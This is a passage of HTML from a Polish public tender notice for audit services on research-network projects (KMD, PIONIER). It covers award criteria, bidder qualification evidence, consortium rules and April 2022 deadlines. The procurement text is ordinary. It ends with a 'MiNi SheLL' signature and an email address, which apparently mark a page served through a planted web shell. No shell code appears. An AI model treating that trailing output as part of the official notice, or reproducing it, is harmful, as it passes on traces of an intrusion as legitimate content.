Politechnika Świętokrzyska, al. Tysiąclecia Państwa Polskiego 7, 25-314 Kielce, <br/>14)	Politechnika Wrocławska, wyb. Stanisława Wyspiańskiego 27, 50-370 Wrocław,<br/>15)	Uniwersytet Mikołaja Kopernika w Toruniu, ul. Gagarina 11, 87-100 Toruń,<br/>16)	Uniwersytet Opolski, pl. Kopernika 11A, 45-040 Opole,<br/>17)	Uniwersytet Warmińsko-Mazurski w Olsztynie, ul. Oczapowskiego 2, 10-957 Olsztyn,<br/>18)	Uniwersytet Warszawski, ul. Krakowskie Przedmieście 26/28, 00-927 Warszawa,<br/>19)	Uniwersytetem Zielonogórskim, ul. Licealna 9, 65-417 Zielona Góra,<br/>20)	Naukowa i Akademicka Sieć Komputerowa Państwowy Instytut Badawczy, ul. Kolska 12, 01-045, Warszawa.<br/>d)	Projektu pod nazwą „Krajowy Magazyn Danych. Uniwersalna infrastruktura dla składowania i udostępniania danych oraz efektywnego przetwarzania dużych wolumenów danych w modelach HPC, BigData i sztucznej inteligencji”, akronim KMD nr umowy POIR.04.02.00-00-D010/20 z budżetem 190 819 117,31 zł w którym zamawiający wraz z partnerami wymienionymi poniżej uczestniczy poczynając od 1 stycznia 2021 roku, a przewidywany termin zakończenia projektu przypada na 31 grudnia 2023 roku. Audyt musi być przeprowadzony po zrealizowaniu co najmniej 50% planowanych wydatków w projekcie, ale przed zrealizowaniem 80% planowanych wydatków w projekcie, zgodnie z zapisami Wytycznych dla podmiotów audytujących projekty badawczo – rozwojowe. <br/>Partnerami zamawiającego w projekcie są:<br/>1)	Akademia Górniczo-Hutnicza im. Stanisława Staszica w Krakowie, Akademickie Centrum Komputerowe CYFRONET AGH, Al. Mickiewicza 30, 30-059 Kraków,<br/>2)	Politechnika Gdańska CI TASK, ul. Narutowicza 11/12, 80-233 Gdańsk,<br/>3)	Politechnika Wrocławska, ul. Wyb. Stanisława Wyspiańskiego 27, 50-370 Wrocław,<br/>4)	Politechnika Częstochowska, ul. Dąbrowskiego 69, 42-200 Częstochowa,<br/>5)	Politechnika Białostocka, ul. Wiejska 45a, 15-351 Białystok,<br/>6)	Politechnika Świętokrzyska, Al. Tysiąclecia Państwa Polskiego 7, 25-314 Kielce,<br/>7)	Politechnika Łódzka, ul. Żeromskiego 116, 90-924 Łódź,<br/>8)	Narodowe Centrum Badań Jądrowych, ul. Andrzeja Sołtana 7, 05-400 Otwock-Świerk. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79212000-3 - Usługi audytu</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się kryteriami wyszczególnionymi poniżej. Oferty będą oceniane metodą punktową w skali 100-punktowej, z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki. W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane będą punkty według zasad określonych w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przeprowadzenie audytu z działalności i funkcjonowania sieci PIONIER w okresie od 01.01.2021 r. do 31.12.2021 r., zakończonego opinią potwierdzającą prawidłowość i rzetelność finansowej części sprawozdania dla Rady Konsorcjum PIONIER. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79212000-3 - Usługi audytu</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-04-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się kryteriami wyszczególnionymi poniżej. Oferty będą oceniane metodą punktową w skali 100-punktowej, z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki. W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane będą punkty według zasad określonych w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: <br/>1)	nie podlegają wykluczeniu na zasadach opisanych w pkt. I.6 SWZ;<br/>2)	spełniają warunki udziału w postępowaniu dotyczące:<br/>a)	zdolności do występowania w obrocie gospodarczym;<br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>c)	sytuacji ekonomicznej lub finansowej;<br/>d)	zdolności technicznej lub zawodowej;<br/>– określone przez zamawiającego w ogłoszeniu o zamówieniu i SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu <br/>o udzielenie zamówienia publicznego, zamawiający żąda następujących podmiotowych środków dowodowych:<br/>1)	oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia zawarto w załączniku nr 3 do SWZ;<br/>2)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji <br/>o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. Wykonawca nie jest zobowiązany do złożenia dokumentu, jeśli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów;<br/>3)	oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa: <br/>a)	w art. 108 ust. 1 pkt 3 ustawy Pzp;<br/>b)	w art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się <br/>o zamówienie publiczne tytułem środka zapobiegawczego;<br/>c)	w art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji;<br/>d)	w art. 108 ust. 1 pkt 6 ustawy Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu zamawiający żąda następujących podmiotowych środków dowodowych:<br/>1)	zaświadczenie Krajowej Izby Biegłych Rewidentów o wpisaniu na listę uprawnionych do badania sprawozdań finansowych – dotyczy ofert na część nr 1 i 3 zamówienia;<br/>2)	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. Wzór wykazu usług o których mowa w punkcie I.5.2. ppkt 4) lit. a) stanowi załącznik nr 7 do SWZ – dotyczy ofert na części nr 1-3.<br/>Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć podmiotowych środków dowodowych wymaganych przez zamawiającego, w celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej, wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają spełnianie opisanego przez zamawiającego warunku udziału w postępowaniu lub kryterium selekcji dotyczącego zdolności technicznej lub zawodowej;<br/>3)	Wykaz osób o których mowa w punkcie I.5.2. ppkt 4) lit. b) skierowanych przez wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia publicznego oraz informacją o podstawie do dysponowania tymi osobami. Wzór wykazu osób stanowi załącznik nr 6 do SWZ – dotyczy ofert na część nr 2 i 3 zamówienia.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienie w Formularzu oferty należy wskazać firmy (nazwy) wszystkich wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia.<br/>2.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. <br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika <br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania <br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>4.	Oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa załączonego <br/>do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania.<br/>5.	Aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia z postępowania <br/>oraz spełnianiu warunków udziału w postępowaniu - zgodnie z załącznikiem nr 1 do SWZ, składa każdy z wykonawców wspólnie ubiegających się o zamówienie.<br/>6.	Dokumenty, potwierdzające brak podstawy wykluczenia, które zostały przewidziane względem wykonawcy zobowiązany będzie złożyć każdy z wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia.<br/>7.	Wszyscy wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą odpowiedzialność solidarną za realizację zamówienia tj. wykonanie umowy.<br/>8.	Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna.<br/>9.	Przed zawarciem umowy w sprawie zamówienia publicznego, wykonawcy wspólnie ubiegający się o udzielenie zamówienia przedstawią zamawiającemu umowę regulującą ich współpracę. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z postanowieniami art. 455 ust. 1 pkt 1 ustawy Pzp Zamawiający przewiduje możliwość<br/>dokonania zmian postanowień zawartej umowy w stosunku do treści oferty. Na podstawie<br/>art. 455 ust. 1 pkt 1 ustawy Pzp, Zamawiający dopuszcza:<br/>a) aktualizację danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy firmy, zmianę<br/>adresu siedziby, zmianę formy prawnej Wykonawcy itp.; Zamawiający dopuszcza również<br/>zmiany postanowień zawartej umowy w przypadkach określonych w art. 455 ust. 1 i 2 ustawy<br/>Pzp <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-01 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/pcss_poznan</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-01 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-30</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com